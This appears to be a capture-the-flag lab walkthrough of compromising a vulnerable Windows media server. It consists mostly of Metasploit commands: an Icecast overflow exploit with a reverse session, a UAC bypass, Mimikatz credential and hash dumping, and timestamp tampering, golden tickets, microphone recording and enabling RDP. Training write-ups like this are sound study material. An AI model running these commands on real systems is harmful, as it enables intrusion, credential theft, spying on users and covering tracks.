Deploy & hack into a Windows machine, exploiting a very poorly secured media server.
scan the machine
nmap -sS -sV -sC -T4 10.10.97.40
wow, a vulnerable machine with a lot of open port
and nmap also aprear a smb result
search for the vulnerabilites of it's service
msfconsole
search icecast
we found a execute code overflow of CVE-2004-1561
use 0
info
show options
set RHOSTS 10.10.97.40
set LHOST 10.18.37.45
exploit
we gain an access, let's look around
getuid
sysinfo
metasploit provides a module that will automatically scan for potential escalation exploits based on the system that we are in
run post/multi/recon/local_exploit_suggester
we found an exploit, background the session before use
Ctrl + Z
use exploit/windows/local/bypassuac_eventvwr
show options
set session 1
set LHOST 10.18.37.45
exploit
check our permission
getprivs
we already got a lot of roles, include take ownership of files
even though we have a lot of privileges in the system, but our current process does not
ps
so now we want to migrate to another, spoolsv.exe is owned by 'NT AUTHORITY\SYSTEM' one of example
migrate -N 1376
getuid
now, we are in 'NT AUTHORITY\SYSTEM' that are full administrator permissions
using Mimikatz to retrieve all the credentials
load kiwi
creds_all
there you go!
this section wants to hone your skills about the meterpreter and Mimikatz
have a look at the documentation by typing:
help
What command allows us to dump all of the password hashes stored on the system? We won't crack the Administrative password in this case as it's pretty strong (this is intentional to avoid password spraying attempts)
hashdump
While more useful when interacting with a machine being used, what command allows us to watch the remote user's desktop in real time?
screenshare
How about if we wanted to record from a microphone attached to the system?
record_mic
To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don't ever do this on a pentest unless you're explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact.
timestomp
Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?
golden_ticket_create
As we have the password for the user 'Dark' we can now authenticate to the machine and access it via remote desktop (MSRDP). As this is a workstation, we'd likely kick whatever user is signed onto it off if we connect to it, however, it's always interesting to remote into machines and view them as their users do.
If this hasn't already been enabled, we can enable it via the following Metasploit module: run post/windows/manage/enable_rdp